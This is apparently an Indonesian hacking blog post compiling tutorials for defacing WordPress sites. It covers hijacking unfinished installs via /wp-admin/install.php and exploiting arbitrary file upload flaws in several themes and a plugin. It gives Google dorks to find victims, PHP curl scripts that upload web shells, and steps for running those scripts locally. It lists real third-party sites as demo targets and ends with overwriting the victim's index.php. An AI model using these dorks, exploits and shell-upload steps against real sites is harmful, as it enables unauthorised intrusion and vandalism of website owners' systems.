Senin, 14 April 2014

DEFACE WORDPRESS MENGGUNAKAN TEKNIK WP-INSTALL

Kalo uda selesai, dah ketikkan diform pencarian /wp-admin/install.php bisa ditambahin Country:ID (Indonesia) / MY (Malaysia) / yang lain

HACK WORDPRESS




Pilih HTTP/1.0 302 Found, ya pasti uda tau lah knapa harus yg HTTP/1.0 302 Found.,.,kenapa bukan yg HTTP/1.0 302 Moved Temporarily
Karena kan kalau Found berarti Ditemukan, nah udah itu aja penjelasannya intinya pilih yg Found ,



Next, Isi Form nya,meliputi :

Site Title
Username
Password



seperti gambar dibawah :

TARAA.... FINISHH! Big Grin Mulai deh ganti tagline/title nya biar KE INDEX GOOGLE Big Grin



============================================================================

CATATAN :
KALO MUNCUL GINIAN , NIH , , (CEK GAMBAR DIBAWAH)
BERARTI NDAK BISA , LANJUT CARI LAGI AJA COZ UDA DI INSTALL SAMA SI EMPU NYA/KALAH CEPET MA ORANGG YANG LAGI BACA NIH TUTZ 
HACK WORDPRESS


HACK WORDPRESS

Deface Dengan WP-Store Themes Uploader

Langkah-Langkah:
1. Cari target dengan Google Dork ini:
inurl:/wp-content/themes/eShop/ 
inurl:/wp-content/themes/WPStore/
inurl:/wp-content/themes/Store/
*Anda bisa menambahkan elemen Site: Di belakang Google Dork Tersebut
Ex: site:co.uk dll

2. Setelah Target ditemukan. langkah selanjutnya adalah masukkan exploit ini:
/wp-content/themes/WPStore/upload/
ex: site.com/wp-content/themes/eShop/style.css
menjadi
site.com/wp-content/themes/WPStore/upload/



3. Setelah muncul tampilan seperti gambar diatas. Lalu kamu Upload Shell / Script Deface dalam bentuk .html
4. Setelah selesai, masukkan wp-content/uploads/products_img/namashell.php setelah alamat web target.
Ex: site.com/wp-content/themes/WPStore/upload/
menjadi
site.com/wp-content/uploads/products_img/namashell.php
*nama shell diganti dengan nama shell kamu.
*jika 404 not found, berarti web tersebut tidak bisa di tanam shell. dan cobalah untuk mengupload script deface.
5. Setelah masuk ke dalam shell. Tebas deh index.php nya. bukan index.html nya.

Copied by : scupe.id

Tutorial Deface Magnitudo theme Arbitrary File Upload Vulnerability

Google Dork : inurl:wp-content/themes/magnitudo 
Use your brain untuk menemukan dork lainnya :)

Exploit :

<?php
$uploadfile="shell.php";
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Pertama download XAMMP nya HERE HERE

Jika Sudah , Cari File php.ini di System[C] -> Xammp -> Php -> Php.ini

Lalu tekan Control F dan ketikkan "curl" tanpa tanda kutip , lalu jika ketemu kamu hapus tandan ( ; ) , Lalu save ..

Oke , sekarang kamu Copy Exploitnya dan save dengan extensi .php

Simpan di folder xammp -> xammp -> PHP

Kedua , kamu copy shell kamu ke Folder xammp -> xammp -> PHP

Misalkan nama shell anda x.php ganti shell php yang ada di exploit tadi

$uploadfile="shell.php"; kamu rename dengan nama shell kamu tadi jika namanya x.php kamu rename menjadi x.php juga :))

Oke sekarang langsung saja , Pertama kita cari target dengan GOOGLE DORK tadi

Ex : http:/www.site.com/

Lalu tambahkan dengan exploitnya
/wordpress/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php

Jika Ada Error Files Upload  berarti itu vuln .

Buka exploitnya kamu copy semuanya ke exploit tadi 

Lalu buka CMD , 

Ketikkan cd xammp enter >> cd php enter

Jika succes , filenya akan berada disini



http://site.com/wordpress/wp-content/uploads/2013/10/x.php

Sekian dulu Tutorial Deface Magnitudo theme Arbitrary File Upload Vulnerability Semoga bermanfaat :)

TUTORIAL DEFACE WORDPRESS THEME ARBITRARY FILE UPLOAD VULNERABILITY


Dari pada gua di bilang copaster :v

mending gua buat aja tutornya :v

ntar gua kasih linknya di setiap Postingan, hhaha, ternyata jadi orang ganteng itu gak mudah >.<

Langsung aja ya!

toos :

Xampp | Shell |

~ Pertama Download dulu Xampp
~ Trus Pilih Exploite yang mau kamu cobain, ini adalah Exploite Vuln untuk tutorial ini yang ada di blog saya :

http://irfansyahp.blogspot.com/2013/11/wordpress-saico-theme-arbitrary-file.html
http://irfansyahp.blogspot.com/2013/11/wordpress-area53-theme-arbitrary-file.html
http://irfansyahp.blogspot.com/2013/10/wordpress-ghost-theme-arbitrary-file.html

dan masih banyak yang lainnya, cuman malas doang di jabarkan :3

saya ambil contoh : WordPress Chameleon theme - Arbitrary File Upload Vulnerability

Dork :

Use You'r Brain!!

# Exploit
<?php
$uploadfile="yourfile.php";
$ch = curl_init("http://{Target}/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Path : http://[target]/wp-content/uploads/2013/11/{filename}.php

Demo sites
http://mirrorimagecounseling.org/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
http://sakpasemedia.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
http://www.818420.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php



Langsung kembali ke tutorial!

Pertama buka instal xampp, trus buka Xampp Control dengan cara seperti ini :

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IrfanPutra>cd/xampp/

C:\xampp>xampp-control


trus kamu copy exploite tadi ke dalam notepad trus simpan ke dalam dir ini :

Data C > xampp > php


setelah itu kamu jalankan exploitenya dengan cara :

cd/xampp/php/namafile.php


dan swala :D



Wordpress front end upload 0.5.3 Arbitrary File Upload

Bahan-Bahan:
-XAMPP (Serch Di Google Banyak Kok)
-Shell (Bisa Pakek Shell GCA)

Langkah-Langkah:
1).Search Di Google Gunakan Dork

inurl:wp-content/plugins/front-end-upload/

3).Jika Ketemu Masukan Exploit /wp-content/plugins/front-end-upload/upload.php

4).Buat File Baru Berekstensi .php Contoh lol.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit :D


<?php
$u="namashell.php";
$c = curl_init("http://site.com/wp-content/plugins/front-end-upload/upload.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('file'=>"@$u",'name'=>"shell.php"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>


4).Masukan Shell Ente Juga Jadi Ada Dua File Di Directory C:/XAMPP/php yaitu Shell Dan Script Tadi :D



5).Aktifkan XAMPP Klik Start Pada Apache




6).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
7).Ketik cd\xampp/php



8)ketik php namascript.php Contoh: php lol.php
9).Jika Succes Akan Ada Nama Shellnya :D
10).Untuk Letak Shellnya Ada Di
http://site.com/wp-content/uploads/iti_feu_uploads/shell.php

Postingan Lebih Baru Postingan Lama Beranda